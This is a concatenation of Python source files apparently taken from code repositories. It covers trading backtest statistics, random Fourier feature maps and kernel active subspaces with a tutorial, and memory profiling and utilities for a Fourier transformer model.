def ratio_avg_profit_win_loss(tlog):
if avg_profit_per_winning_trade(tlog) == 0: return 0
if avg_loss_per_losing_trade(tlog) == 0: return 1000
return (avg_profit_per_winning_trade(tlog) /
avg_loss_per_losing_trade(tlog) * -1)
def largest_profit_winning_trade(tlog):
if num_winning_trades(tlog) == 0: return 0
return tlog[tlog['pl_cash'] > 0].max()['pl_cash']
def largest_loss_losing_trade(tlog):
if num_losing_trades(tlog) == 0: return 0
return tlog[tlog['pl_cash'] < 0].min()['pl_cash']
#####################################################################
# POINTS
def num_winning_points(tlog):
if num_winning_trades(tlog) == 0: return 0
return tlog[tlog['pl_points'] > 0].sum()['pl_points']
def num_losing_points(tlog):
if num_losing_trades(tlog) == 0: return 0
return tlog[tlog['pl_points'] < 0].sum()['pl_points']
def total_net_points(tlog):
return num_winning_points(tlog) + num_losing_points(tlog)
def avg_points(tlog):
if total_num_trades(tlog) == 0: return 0
return tlog['pl_points'].sum() / len(tlog.index)
def largest_points_winning_trade(tlog):
if num_winning_trades(tlog) == 0: return 0
return tlog[tlog['pl_points'] > 0].max()['pl_points']
def largest_points_losing_trade(tlog):
if num_losing_trades(tlog) == 0: return 0
return tlog[tlog['pl_points'] < 0].min()['pl_points']
def avg_pct_gain_per_trade(tlog):
if total_num_trades(tlog) == 0: return 0
df = tlog['pl_points'] / tlog['entry_price']
return np.average(df) * 100
def largest_pct_winning_trade(tlog):
if num_winning_trades(tlog) == 0: return 0
df = tlog[tlog['pl_points'] > 0]
df = df['pl_points'] / df['entry_price']
return df.max() * 100
def largest_pct_losing_trade(tlog):
if num_losing_trades(tlog) == 0: return 0
df = tlog[tlog['pl_points'] < 0]
df = df['pl_points'] / df['entry_price']
return df.min() * 100
#####################################################################
# STREAKS
def _subsequence(s, c):
"""
Takes as parameter list like object s and returns the length of the longest
subsequence of s constituted only by consecutive character 'c's.
Example: If the string passed as parameter is "001000111100", and c is '0',
then the longest subsequence of only '0's has length 3.
"""
count = 0 # current length of the sequence of zeros
maxlen = 0 # temporary value of the maximum length
for bit in s:
if bit == c: # we have read a new '0'
count += 1 # update the length of the current sequence
if count > maxlen: # if necessary, update the temporary maximum
maxlen = count
else: # we have read a 1
count = 0 # reset the length of the current sequence
return maxlen
def max_consecutive_winning_trades(tlog):
if num_winning_trades(tlog) == 0: return 0
return _subsequence(tlog['pl_cash'] > 0, True)
def max_consecutive_losing_trades(tlog):
if num_losing_trades(tlog) == 0: return 0
return _subsequence(tlog['pl_cash'] > 0, False)
def avg_bars_winning_trades(ts, tlog):
if num_winning_trades(tlog) == 0: return 0
return np.average(_get_trade_bars(ts, tlog, operator.gt))
def avg_bars_losing_trades(ts, tlog):
if num_losing_trades(tlog) == 0: return 0
return np.average(_get_trade_bars(ts, tlog, operator.lt))
#####################################################################
# DRAWDOWN AND RUNUP
def max_closed_out_drawdown(close):
""" only compare each point to the previous running peak O(N) """
running_max = pd.Series(close).expanding(min_periods=1).max()
cur_dd = (close - running_max) / running_max * 100
dd_max = min(0, cur_dd.min())
idx = cur_dd.idxmin()
dd = pd.Series()
dd['max'] = dd_max
dd['peak'] = running_max[idx]
dd['trough'] = close[idx]
dd['start_date'] = close[close == dd['peak']].index[0].strftime('%Y-%m-%d')
dd['end_date'] = idx.strftime('%Y-%m-%d')
close = close[close.index > idx]
rd_mask = close > dd['peak']
if rd_mask.any():
dd['recovery_date'] = close[rd_mask].index[0].strftime('%Y-%m-%d')
else:
dd['recovery_date'] = 'Not Recovered Yet'
return dd
def max_intra_day_drawdown(high, low):
""" only compare each point to the previous running peak O(N) """
running_max = pd.Series(high).expanding(min_periods=1).max()
cur_dd = (low - running_max) / running_max * 100
dd_max = min(0, cur_dd.min())
idx = cur_dd.idxmin()
dd = pd.Series()
dd['max'] = dd_max
dd['peak'] = running_max[idx]
dd['trough'] = low[idx]
dd['start_date'] = high[high == dd['peak']].index[0].strftime('%Y-%m-%d')
dd['end_date'] = idx.strftime('%Y-%m-%d')
high = high[high.index > idx]
rd_mask = high > dd['peak']
if rd_mask.any():
dd['recovery_date'] = high[rd_mask].index[0].strftime('%Y-%m-%d')
return dd
def _windowed_view(x, window_size):
"""Create a 2d windowed view of a 1d array.
`x` must be a 1d numpy array.
`numpy.lib.stride_tricks.as_strided` is used to create the view.
The data is not copied.
Example:
>>> x = np.array([1, 2, 3, 4, 5, 6])
>>> _windowed_view(x, 3)
array([[1, 2, 3],
[2, 3, 4],
[3, 4, 5],
[4, 5, 6]])
"""
y = as_strided(x, shape=(x.size - window_size + 1, window_size),
strides=(x.strides[0], x.strides[0]))
return y
def rolling_max_dd(ser, period, min_periods=1):
"""Compute the rolling maximum drawdown of `ser`.
`ser` must be a Series.
`min_periods` should satisfy `1 <= min_periods <= window_size`.
    Returns a pandas Series with the same index as `ser`.
"""
window_size = period + 1
x = ser.values
if min_periods < window_size:
pad = np.empty(window_size - min_periods)
pad.fill(x[0])
x = np.concatenate((pad, x))
y = _windowed_view(x, window_size)
running_max_y = np.maximum.accumulate(y, axis=1)
dd = (y - running_max_y) / running_max_y * 100
rmdd = dd.min(axis=1)
return pd.Series(data=rmdd, index=ser.index, name=ser.name)
def rolling_max_ru(ser, period, min_periods=1):
"""Compute the rolling maximum runup of `ser`.
`ser` must be a Series.
`min_periods` should satisfy `1 <= min_periods <= window_size`.
    Returns a pandas Series with the same index as `ser`.
"""
window_size = period + 1
x = ser.values
if min_periods < window_size:
pad = np.empty(window_size - min_periods)
pad.fill(x[0])
x = np.concatenate((pad, x))
y = _windowed_view(x, window_size)
running_min_y = np.minimum.accumulate(y, axis=1)
ru = (y - running_min_y) / running_min_y * 100
rmru = ru.max(axis=1)
return pd.Series(data=rmru, index=ser.index, name=ser.name)
#####################################################################
# PERCENT CHANGE - used to compute several statistics
def pct_change(close, period):
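    # Forward-looking percent change: compares each close with the close `period`
    # bars later (via shift(-period)) and drops the resulting trailing NaNs.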
diff = (close.shift(-period) - close) / close * 100
diff.dropna(inplace=True)
return diff
#####################################################################
# RATIOS
def sharpe_ratio(rets, risk_free=0.00, period=TRADING_DAYS_PER_YEAR):
"""
summary Returns the daily Sharpe ratio of the returns.
param rets: 1d numpy array or fund list of daily returns (centered on 0)
param risk_free: risk free returns, default is 0%
return Sharpe Ratio, computed off daily returns
"""
dev = np.std(rets, axis=0)
mean = np.mean(rets, axis=0)
sharpe = (mean*period - risk_free) / (dev * np.sqrt(period))
return sharpe
def sortino_ratio(rets, risk_free=0.00, period=TRADING_DAYS_PER_YEAR):
"""
summary Returns the daily Sortino ratio of the returns.
param rets: 1d numpy array or fund list of daily returns (centered on 0)
param risk_free: risk free return, default is 0%
return Sortino Ratio, computed off daily returns
"""
mean = np.mean(rets, axis=0)
negative_rets = rets[rets < 0]
dev = np.std(negative_rets, axis=0)
sortino = (mean*period - risk_free) / (dev * np.sqrt(period))
return sortino
#####################################################################
# STATS - this is the primary call used to generate the results
def stats(ts, tlog, dbal, start, end, capital):
"""
Compute trading stats
Parameters
----------
ts : Dataframe
Time series of security prices (date, high, low, close, volume,
adj_close)
tlog : Dataframe
Trade log (entry_date, entry_price, long_short, qty,
exit_date, exit_price, pl_points, pl_cash, cumul_total)
dbal : Dataframe
Daily Balance (date, high, low, close)
start : datetime
date of first buy
end : datetime
date of last sell
capital : float
starting capital
Examples
--------
Returns
-------
stats : Series of stats
"""
stats = pd.Series()
# OVERALL RESULTS
stats['start'] = start.strftime('%Y-%m-%d')
stats['end'] = end.strftime('%Y-%m-%d')
stats['beginning_balance'] = beginning_balance(capital)
stats['ending_balance'] = ending_balance(dbal)
stats['total_net_profit'] = total_net_profit(tlog)
stats['gross_profit'] = gross_profit(tlog)
stats['gross_loss'] = gross_loss(tlog)
stats['profit_factor'] = profit_factor(tlog)
stats['return_on_initial_capital'] = return_on_initial_capital(tlog, capital)
cagr = annual_return_rate(dbal['close'][-1], capital, start, end)
stats['annual_return_rate'] = cagr
stats['trading_period'] = trading_period(start, end)
stats['pct_time_in_market'] = pct_time_in_market(dbal)
# SUMS
stats['total_num_trades'] = total_num_trades(tlog)
stats['trades_per_year'] = trades_per_year(tlog, start, end)
stats['num_winning_trades'] = num_winning_trades(tlog)
stats['num_losing_trades'] = num_losing_trades(tlog)
stats['num_even_trades'] = num_even_trades(tlog)
stats['pct_profitable_trades'] = pct_profitable_trades(tlog)
# CASH PROFITS AND LOSSES
stats['avg_profit_per_trade'] = avg_profit_per_trade(tlog)
stats['avg_profit_per_winning_trade'] = avg_profit_per_winning_trade(tlog)
stats['avg_loss_per_losing_trade'] = avg_loss_per_losing_trade(tlog)
stats['ratio_avg_profit_win_loss'] = ratio_avg_profit_win_loss(tlog)
stats['largest_profit_winning_trade'] = largest_profit_winning_trade(tlog)
stats['largest_loss_losing_trade'] = largest_loss_losing_trade(tlog)
# POINTS
stats['num_winning_points'] = num_winning_points(tlog)
stats['num_losing_points'] = num_losing_points(tlog)
stats['total_net_points'] = total_net_points(tlog)
stats['avg_points'] = avg_points(tlog)
stats['largest_points_winning_trade'] = largest_points_winning_trade(tlog)
stats['largest_points_losing_trade'] = largest_points_losing_trade(tlog)
stats['avg_pct_gain_per_trade'] = avg_pct_gain_per_trade(tlog)
stats['largest_pct_winning_trade'] = largest_pct_winning_trade(tlog)
stats['largest_pct_losing_trade'] = largest_pct_losing_trade(tlog)
# STREAKS
stats['max_consecutive_winning_trades'] = max_consecutive_winning_trades(tlog)
stats['max_consecutive_losing_trades'] = max_consecutive_losing_trades(tlog)
stats['avg_bars_winning_trades'] = avg_bars_winning_trades(ts, tlog)
stats['avg_bars_losing_trades'] = avg_bars_losing_trades(ts, tlog)
# DRAWDOWN
dd = max_closed_out_drawdown(dbal['close'])
stats['max_closed_out_drawdown'] = dd['max']
stats['max_closed_out_drawdown_start_date'] = dd['start_date']
stats['max_closed_out_drawdown_end_date'] = dd['end_date']
stats['max_closed_out_drawdown_recovery_date'] = dd['recovery_date']
stats['drawdown_recovery'] = _difference_in_years(
datetime.strptime(dd['start_date'], '%Y-%m-%d'),
datetime.strptime(dd['end_date'], '%Y-%m-%d')) *-1
stats['drawdown_annualized_return'] = dd['max'] / cagr
dd = max_intra_day_drawdown(dbal['high'], dbal['low'])
stats['max_intra_day_drawdown'] = dd['max']
dd = rolling_max_dd(dbal['close'], TRADING_DAYS_PER_YEAR)
stats['avg_yearly_closed_out_drawdown'] = np.average(dd)
stats['max_yearly_closed_out_drawdown'] = min(dd)
dd = rolling_max_dd(dbal['close'], TRADING_DAYS_PER_MONTH)
stats['avg_monthly_closed_out_drawdown'] = np.average(dd)
stats['max_monthly_closed_out_drawdown'] = min(dd)
dd = rolling_max_dd(dbal['close'], TRADING_DAYS_PER_WEEK)
stats['avg_weekly_closed_out_drawdown'] = np.average(dd)
stats['max_weekly_closed_out_drawdown'] = min(dd)
# RUNUP
ru = rolling_max_ru(dbal['close'], TRADING_DAYS_PER_YEAR)
stats['avg_yearly_closed_out_runup'] = np.average(ru)
stats['max_yearly_closed_out_runup'] = ru.max()
ru = rolling_max_ru(dbal['close'], TRADING_DAYS_PER_MONTH)
stats['avg_monthly_closed_out_runup'] = np.average(ru)
stats['max_monthly_closed_out_runup'] = max(ru)
ru = rolling_max_ru(dbal['close'], TRADING_DAYS_PER_WEEK)
stats['avg_weekly_closed_out_runup'] = np.average(ru)
stats['max_weekly_closed_out_runup'] = max(ru)
# PERCENT CHANGE
pc = pct_change(dbal['close'], TRADING_DAYS_PER_YEAR)
stats['pct_profitable_years'] = (pc > 0).sum() / len(pc) * 100
stats['best_year'] = pc.max()
stats['worst_year'] = pc.min()
stats['avg_year'] = np.average(pc)
stats['annual_std'] = pc.std()
pc = pct_change(dbal['close'], TRADING_DAYS_PER_MONTH)
stats['pct_profitable_months'] = (pc > 0).sum() / len(pc) * 100
stats['best_month'] = pc.max()
stats['worst_month'] = pc.min()
stats['avg_month'] = np.average(pc)
stats['monthly_std'] = pc.std()
pc = pct_change(dbal['close'], TRADING_DAYS_PER_WEEK)
stats['pct_profitable_weeks'] = (pc > 0).sum() / len(pc) * 100
stats['best_week'] = pc.max()
stats['worst_week'] = pc.min()
stats['avg_week'] = np.average(pc)
stats['weekly_std'] = pc.std()
# RATIOS
stats['sharpe_ratio'] = sharpe_ratio(dbal['close'].pct_change())
stats['sortino_ratio'] = sortino_ratio(dbal['close'].pct_change())
return stats
#####################################################################
# SUMMARY - stats() must be called before calling any of these functions
def summary(stats, *metrics):
"""
Returns stats summary in a DataFrame.
stats() must be called before calling this function
"""
index = []
columns = ['strategy']
data = []
# add metrics
for metric in metrics:
index.append(metric)
data.append(stats[metric])
df = pd.DataFrame(data, columns=columns, index=index)
return df
def summary2(stats, benchmark_stats, *metrics):
"""
Returns stats with benchmark summary in a DataFrame.
stats() must be called before calling this function
"""
index = []
columns = ['strategy', 'benchmark']
data = []
# add metrics
for metric in metrics:
index.append(metric)
data.append((stats[metric], benchmark_stats[metric]))
df = pd.DataFrame(data, columns=columns, index=index)
return df
def summary3(stats, benchmark_stats, *extras):
"""
Returns stats with benchmark summary in a DataFrame.
stats() must be called before calling this function
*extras: extra metrics
"""
index = ['annual_return_rate',
'max_closed_out_drawdown',
'drawdown_annualized_return',
'pct_profitable_months',
'best_month',
'worst_month',
'sharpe_ratio',
'sortino_ratio']
columns = ['strategy', 'benchmark']
data = [(stats['annual_return_rate'],
benchmark_stats['annual_return_rate']),
(stats['max_closed_out_drawdown'],
benchmark_stats['max_closed_out_drawdown']),
(stats['drawdown_annualized_return'],
benchmark_stats['drawdown_annualized_return']),
(stats['pct_profitable_months'],
benchmark_stats['pct_profitable_months']),
(stats['best_month'],
benchmark_stats['best_month']),
(stats['worst_month'],
benchmark_stats['worst_month']),
(stats['sharpe_ratio'],
benchmark_stats['sharpe_ratio']),
(stats['sortino_ratio'],
benchmark_stats['sortino_ratio'])]
# add extra metrics
for extra in extras:
index.append(extra)
data.append((stats[extra], benchmark_stats[extra]))
df = pd.DataFrame(data, columns=columns, index=index)
return df
def summary4(stats):
"""
Returns currency stats summary in a DataFrame.
stats() must be called before calling this function
"""
index = ['beginning_balance',
'ending_balance',
'total_net_profit',
'gross_profit',
'gross_loss']
columns = ['strategy']
data = [currency(stats['beginning_balance']),
currency(stats['ending_balance']),
currency(stats['total_net_profit']),
currency(stats['gross_profit']),
currency(stats['gross_loss'])]
df = pd.DataFrame(data, columns=columns, index=index)
return df
def summary5(stats, benchmark_stats):
"""
Returns currency stats with benchmark summary in a DataFrame.
stats() must be called before calling this function
"""
index = ['beginning_balance',
'ending_balance',
'total_net_profit',
'gross_profit',
'gross_loss']
columns = ['strategy', 'benchmark']
data = [(currency(stats['beginning_balance']),
currency(benchmark_stats['beginning_balance'])),
(currency(stats['ending_balance']),
currency(benchmark_stats['ending_balance'])),
(currency(stats['total_net_profit']),
currency(benchmark_stats['total_net_profit'])),
(currency(stats['gross_profit']),
currency(benchmark_stats['gross_profit'])),
(currency(stats['gross_loss']),
currency(benchmark_stats['gross_loss']))]
df = pd.DataFrame(data, columns=columns, index=index)
return df
``` |
{
"source": "Jimmy-INL/ATHENA",
"score": 3
} |
#### File: ATHENA/athena/feature_map.py
```python
from functools import partial
import numpy as np
from scipy.optimize import brute, dual_annealing
import GPyOpt
from .projection_factory import ProjectionFactory
class FeatureMap():
"""Feature map class.
    :param str distr: name of the spectral distribution to sample the projection
        matrix from.
    :param numpy.ndarray bias: n_features dimensional bias. It is sampled from a
        Uniform distribution on the interval [0, 2*PI].
:param int input_dim: dimension of the input space.
:param int n_features: dimension of the Reproducing Kernel Hilbert Space.
    :param list params: hyperparameters of the spectral distribution.
:param int sigma_f: multiplicative constant of the feature
map. Usually it is set as the empirical variance of the outputs.
:cvar callable fmap: feature map used to project the input samples to the RKHS.
Default value is rff_map.
:cvar callable fjac: Jacobian matrix of fmap. Default value is rff_jac, the
analytical Jacobian of fmap.
:cvar numpy.ndarray _pr_matrix: n_features-by-input_dim projection
matrix, whose rows are sampled from the spectral distribution distr.
:raises TypeError
"""
def __init__(self, distr, bias, input_dim, n_features, params, sigma_f):
if callable(distr):
self.distr = distr
elif isinstance(distr, str):
self.distr = ProjectionFactory(distr)
else:
raise TypeError('`distr` is not valid.')
self.bias = bias
self.input_dim = input_dim
self.n_features = n_features
self.params = params
self.sigma_f = sigma_f
self.fmap = rff_map
self.fmap_jac = rff_jac
self._pr_matrix = None
@property
def pr_matrix(self):
"""
Get the projection matrix.
:return: the projection matrix.
:rtype: numpy.ndarray
"""
return self._pr_matrix
def _compute_pr_matrix(self):
"""
        Sample the projection matrix from the spectral distribution.
:return: the projection matrix.
:rtype: numpy.ndarray
"""
return self.distr(self.input_dim, self.n_features, self.params)
def compute_fmap(self, inputs):
"""
Evaluate the feature map at inputs.
:param numpy.ndarray inputs: the inputs to project on the RKHS.
:return: the n_features dimensional projection of the inputs.
:rtype: numpy.ndarray
"""
if self._pr_matrix is None:
self._pr_matrix = self._compute_pr_matrix()
return self.fmap(inputs, self._pr_matrix, self.bias, self.n_features,
self.sigma_f)
def compute_fmap_jac(self, inputs):
"""
Evaluate the Jacobian matrix of feature map at inputs.
:param numpy.ndarray inputs: the inputs at which compute the Jacobian
matrix of the feature map.
:return: the n_features-by-input_dim dimensional Jacobian of the
feature map at the inputs.
:rtype: numpy.ndarray
"""
if self._pr_matrix is None:
self._pr_matrix = self._compute_pr_matrix()
return self.fmap_jac(inputs, self._pr_matrix, self.bias,
self.n_features, self.sigma_f)
def tune_pr_matrix(self,
func,
bounds,
args=(),
method=None,
maxiter=50,
save_file=False):
"""
Tune the parameters of the spectral distribution. Three methods are
available: log-grid-search (brute), annealing (dual_annealing) and
Bayesian stochastic optimization (bso) from GpyOpt. The default object
function to optimize is athena.utils.average_rrmse, which uses a
cross-validation procedure from athena.utils, see Example and tutorial 06_kernel-based_AS.
:Example:
>>> from athena.kas import KernelActiveSubspaces
>>> from athena.feature_map import FeatureMap
>>> from athena.projection_factory import ProjectionFactory
>>> from athena.utils import CrossValidation, average_rrmse
>>> input_dim, output_dim, n_samples = 2, 1, 30
>>> n_features, n_params = 10, 1
>>> xx = np.ones((n_samples, input_dim))
>>> f = np.ones((n_samples, output_dim))
>>> df = np.ones((n_samples, output_dim, input_dim))
>>> fm = FeatureMap(distr='laplace',
bias=np.random.uniform(0, 2 * np.pi, n_features),
input_dim=input_dim,
n_features=n_features,
params=np.zeros(n_params),
sigma_f=f.var())
>>> kss = KernelActiveSubspaces(feature_map=fm, dim=1, n_features=n_features)
>>> csv = CrossValidation(inputs=xx,
outputs=f.reshape(-1, 1),
gradients=df.reshape(n_samples, output_dim, input_dim),
folds=3,
subspace=kss)
>>> best = fm.tune_pr_matrix(func=average_rrmse,
bounds=[slice(-2, 1, 0.2) for i in range(n_params)],
args=(csv, ),
method='bso',
maxiter=20,
save_file=False)
:param callable func: the objective function to be minimized.
Must be in the form f(x, *args), where x is the argument in the
form of a 1-D array and args is a tuple of any additional fixed
parameters needed to completely specify the function.
:param tuple bounds: each component of the bounds tuple must be a
slice tuple of the form (low, high, step). It defines bounds for
the objective function parameter in a logarithmic scale. Step will
be ignored for 'dual_annealing' method.
:param tuple args: any additional fixed parameters needed to
completely specify the objective function.
:param str method: method used to optimize the objective function.
Possible values are 'brute', or 'dual_annealing'.
Default value is None, and the choice is made automatically wrt
the dimension of `self.params`. If the dimension is less than 4
brute force is used, otherwise a traditional Generalized
Simulated Annealing will be performed with no local search
strategy applied.
:param int maxiter: the maximum number of global search iterations.
Default value is 50.
:param bool save_file: True to save the optimal projection matrix
:raises: ValueError
:return: list that records the best score and the best projection
matrix. The initial values are 0.8 and a n_features-by-input_dim
numpy.ndarray of zeros.
:rtype: list
"""
best = [0.8, np.zeros((self.n_features, self.input_dim))]
if method is None:
if len(self.params) < 4:
method = 'brute'
else:
method = 'dual_annealing'
if method == 'brute':
self.params = brute(func=func,
ranges=bounds,
args=(
*args,
best,
),
finish=None)
elif method == 'dual_annealing':
bounds_list = [[bound.start, bound.stop] for bound in bounds]
self.params = 10**dual_annealing(func=func,
bounds=bounds_list,
args=(
*args,
best,
),
maxiter=maxiter,
no_local_search=False).x
elif method == 'bso':
bounds = [{
'name': 'var_' + str(i),
'type': 'continuous',
'domain': [bound.start, bound.stop]
} for i, bound in enumerate(bounds)]
func_obj = partial(func, csv=args[0], best=best)
bopt = GPyOpt.methods.BayesianOptimization(func_obj,
domain=bounds,
model_type='GP',
acquisition_type='EI',
exact_feval=True)
bopt.run_optimization(max_iter=maxiter,
max_time=3600,
eps=1e-16,
verbosity=False)
self.params = 10**bopt.x_opt
else:
raise ValueError(
"Method argument can only be 'brute' or 'dual_annealing' or 'bso'."
)
self._pr_matrix = best[1]
self.params = best[0]
if save_file:
np.save("opt_pr_matrix", best[1])
return best
def rff_map(inputs, pr_matrix, bias, n_features, sigma_f):
"""
Random Fourier Features map. It can be vectorized for inputs of shape n_samples-by-input_dim.
:param numpy.ndarray inputs: input_dim dimensional inputs to project to the RKHS.
:param numpy.ndarray pr_matrix: n_features-by-input_dim projection matrix,
whose rows are sampled from the spectral distribution.
:param numpy.ndarray bias: n_features dimensional bias. It is sampled from a
Uniform distribution on the interval [0, 2*PI].
:param int n_features: dimension of the RKHS.
:param float sigma_f: multiplicative term representing the empirical variance
of the outputs.
:return: n_features dimensional projection of the inputs to the RKHS
:rtype: numpy.ndarray
"""
return np.sqrt(2 / n_features) * sigma_f * np.cos(
np.dot(inputs, pr_matrix.T) + bias.reshape(1, -1))
def rff_jac(inputs, pr_matrix, bias, n_features, sigma_f):
"""
Random Fourier Features map's Jacobian. It can be vectorized for inputs of shape n_samples-by-input_dim.
:param numpy.ndarray inputs: input_dim dimensional inputs to project to the RKHS.
:param numpy.ndarray pr_matrix: n_features-by-input_dim projection matrix,
whose rows are sampled from the spectral distribution.
:param numpy.ndarray bias: n_features dimensional bias. It is sampled from a
Uniform distribution on the interval [0, 2*PI].
:param int n_features: dimension of the RKHS.
:param float sigma_f: multiplicative term representing the empirical variance
of the outputs.
:return: n_features-by-input_dim dimensional projection of the inputs to the RKHS
:rtype: numpy.ndarray
"""
return (np.sqrt(2 / n_features) * sigma_f *
(-1) * np.sin(np.dot(inputs, pr_matrix.T) + bias)).reshape(
inputs.shape[0], n_features, 1) * pr_matrix
```
#### File: tutorials/tutorial06/06_kernel-based_AS.py
```python
import autograd.numpy as np
from autograd import elementwise_grad as egrad
import matplotlib.pyplot as plt
from functools import partial
import GPy
from athena.active import ActiveSubspaces
from athena.kas import KernelActiveSubspaces
from athena.feature_map import FeatureMap, rff_map, rff_jac
from athena.projection_factory import ProjectionFactory
from athena.utils import Normalizer, CrossValidation, average_rrmse
from data.numpy_functions import radial
np.random.seed(42)
# global parameters
n_samples = 800 # this is the number of data points to use for the tuning of kas
N = 500 # this is the number of test samples to use
input_dim = 2
# set the dimension of the discrete feature space (D in the introduction)
n_features = 1000
def sample_in_out(input_dim, n_samples):
#input ranges
lb = np.array(-3 * np.ones(input_dim))
ub = np.array(3 * np.ones(input_dim))
#input normalization
XX = np.random.uniform(lb, ub, (n_samples, input_dim))
nor = Normalizer(lb, ub)
x = nor.fit_transform(XX)
#output values (f) and gradients (df)
func = partial(radial, normalizer=nor, generatrix=lambda x: np.cos(x))
f = func(x)
df = egrad(func)(x)
return x, f, df
xx, f, df = sample_in_out(input_dim, n_samples)
y, t, dt = sample_in_out(input_dim, N)
#AS
ss = ActiveSubspaces(1)
ss.fit(gradients=dt, outputs=t, inputs=y)
ss.plot_eigenvalues()
ss.plot_sufficient_summary(y, t)
# number of parameters of the spectral distribution associated to the feature map
# this is the number of parameters to tune after
n_params = 1
# sample the bias term
b = np.random.uniform(0, 2 * np.pi, n_features)
# define the feature map
fm = FeatureMap(distr='laplace',
bias=b,
input_dim=input_dim,
n_features=n_features,
params=np.zeros(n_params),
sigma_f=f.var())
# instantiate a KernelActiveSubspaces object with associated feature map
kss = KernelActiveSubspaces(feature_map=fm, dim=1, n_features=n_features)
# number of folds for the cross-validation algorithm
folds = 3
# Skip if bias and projection matrix are loaded
csv = CrossValidation(inputs=xx,
outputs=f.reshape(-1, 1),
gradients=df.reshape(n_samples, 1, input_dim),
folds=folds,
subspace=kss)
best = fm.tune_pr_matrix(func=average_rrmse,
bounds=[slice(-2, 1, 0.2) for i in range(n_params)],
args=(csv, ),
method='bso',
maxiter=20,
save_file=False)
print('The lowest rrmse is {}%'.format(best[0]))
W = np.load('opt_pr_matrix.npy')
b = np.load('bias.npy')
fm._pr_matrix = W
fm.bias = b
kss.fit(gradients=dt.reshape(N, 1, input_dim),
outputs=t,
inputs=y)
kss.plot_eigenvalues(n_evals=5)
kss.plot_sufficient_summary(xx, f)
``` |
{
"source": "Jimmy-INL/fourier-transformer",
"score": 2
} |
#### File: fourier-transformer/examples/ex2_memory_profile.py
```python
import sys
sys.path.append("../")
from libs import *
import argparse
import torch.autograd.profiler as profiler
DEBUG = False
def main():
parser = argparse.ArgumentParser(
description='Memory profiling of various transformers for Example 2')
parser.add_argument('--attention-type', nargs='+', metavar='attn_type',
help='input the attention type for encoders to profile (possible: fourier (alias integral, local), galerkin (alias global), softmax (official PyTorch implementation), linear (standard Q(K^TV) with softmax))',
required=True)
parser.add_argument('--batch-size', type=int, default=4, metavar='N',
help='input batch size for profiling (default: 4)')
parser.add_argument('--subsample-nodes', type=int, default=3, metavar='subsample',
help='input fine grid sampling from 421x421 (default: 3 i.e., 141x141 grid)')
parser.add_argument('--subsample-attn', type=int, default=10, metavar='subsample_attn',
help='input coarse grid sampling from 421x421 (default: 10 i.e., 43x43 grid)')
parser.add_argument('--dmodel', type=int, default=64, metavar='E',
help='input d_model of attention for profiling (default: 64)')
parser.add_argument('--num-iter', type=int, default=1, metavar='k',
help='input number of iteration of backpropagations for profiling (default: 1)')
parser.add_argument('--layer-norm', action='store_true', default=False,
help='use the conventional layer normalization')
parser.add_argument('--no-memory', action='store_true', default=False,
help='disables memory profiling')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA in profiling')
args = parser.parse_args()
cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device('cuda' if cuda else 'cpu')
n_grid = int(((421 - 1)/args.subsample_nodes) + 1)
n_grid_c = int(((421 - 1)/args.subsample_attn) + 1)
downsample, upsample = DarcyDataset.get_scaler_sizes(n_grid, n_grid_c)
downsample = [round(x, 2) for x in downsample]
current_path = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(current_path, r'config.yml')) as f:
config = yaml.full_load(f)
config = config['ex2_darcy']
for arg in vars(args):
if arg in config.keys():
config[arg] = getattr(args, arg)
config['downscaler_size'] = downsample
config['upscaler_size'] = upsample
attn_types = args.attention_type
for attn_type in attn_types:
config['attention_type'] = attn_type
torch.cuda.empty_cache()
model = FourierTransformer2D(**config)
model = model.to(device)
print(
f"\nModel name: {model.__name__}\t Number of params: {get_num_params(model)}\n")
node = torch.randn(args.batch_size, n_grid, n_grid, 1).to(device)
pos = torch.randn(args.batch_size, n_grid_c**2, 2).to(device)
target = torch.randn(args.batch_size, n_grid, n_grid, 1).to(device)
grid = torch.randn(args.batch_size, n_grid, n_grid, 2).to(device)
with profiler.profile(profile_memory=not args.no_memory,
use_cuda=cuda,) as pf:
with tqdm(total=args.num_iter, disable=(args.num_iter<10)) as pbar:
for _ in range(args.num_iter):
y = model(node, None, pos, grid)
y = y['preds']
loss = ((y-target)**2).mean()
loss.backward()
pbar.update()
sort_by = "self_cuda_memory_usage" if cuda else "self_cpu_memory_usage"
file_name = os.path.join(SRC_ROOT, f'ex2_{attn_type}.txt')
with open(file_name, 'w') as f:
print(pf.key_averages().table(sort_by=sort_by,
row_limit=300,
header=str(model.__name__) +
' profiling results',
), file=f)
pf_result = ProfileResult(file_name, num_iters=args.num_iter, cuda=cuda)
if cuda:
pf_result.print_total_mem(['Self CUDA Mem'])
pf_result.print_total_time()
if __name__ == '__main__':
main()
```
#### File: fourier-transformer/libs/utils_ft.py
```python
import argparse
import math
import os
import sys
from collections import OrderedDict
from datetime import date
import numpy as np
import pandas as pd
import torch
from matplotlib import rc, rcParams, tri
from numpy.core.numeric import identity
from scipy.io import loadmat
from scipy.sparse import csr_matrix, diags
from scipy.sparse import hstack as sparse_hstack
from torch import nn
from torch.optim.lr_scheduler import OneCycleLR, _LRScheduler
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
try:
from libs.utils import *
except:
from utils import *
try:
import plotly.express as px
import plotly.figure_factory as ff
import plotly.graph_objects as go
import plotly.io as pio
except ImportError as e:
print('Please install Plotly for showing mesh and solutions.')
current_path = os.path.dirname(os.path.abspath(__file__))
SRC_ROOT = os.path.dirname(current_path)
MODEL_PATH = default(os.environ.get('MODEL_PATH'),
os.path.join(SRC_ROOT, 'models'))
DATA_PATH = default(os.environ.get('DATA_PATH'),
os.path.join(SRC_ROOT, 'data'))
FIG_PATH = default(os.environ.get('FIG_PATH'),
os.path.join(os.path.dirname(SRC_ROOT), 'figures'))
EPOCH_SCHEDULERS = ['ReduceLROnPlateau', 'StepLR', 'MultiplicativeLR',
'MultiStepLR', 'ExponentialLR', 'LambdaLR']
PI = math.pi
SEED = default(os.environ.get('SEED'), 1127802)
def clones(module, N):
'''
Input:
- module: nn.Module obj
Output:
- an nn.ModuleList of N independent (deep-copied) layers (not stacked)
Refs:
- https://nlp.seas.harvard.edu/2018/04/03/attention.html
'''
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
def csr_to_sparse(M):
'''
Input:
M: csr_matrix
Output:
torch sparse tensor
Another implementation can be found in
https://github.com/tkipf/pygcn/blob/master/pygcn/utils.py
def sparse_mx_to_torch_sparse_tensor(sparse_mx):
"""Convert a scipy sparse matrix to a torch sparse tensor."""
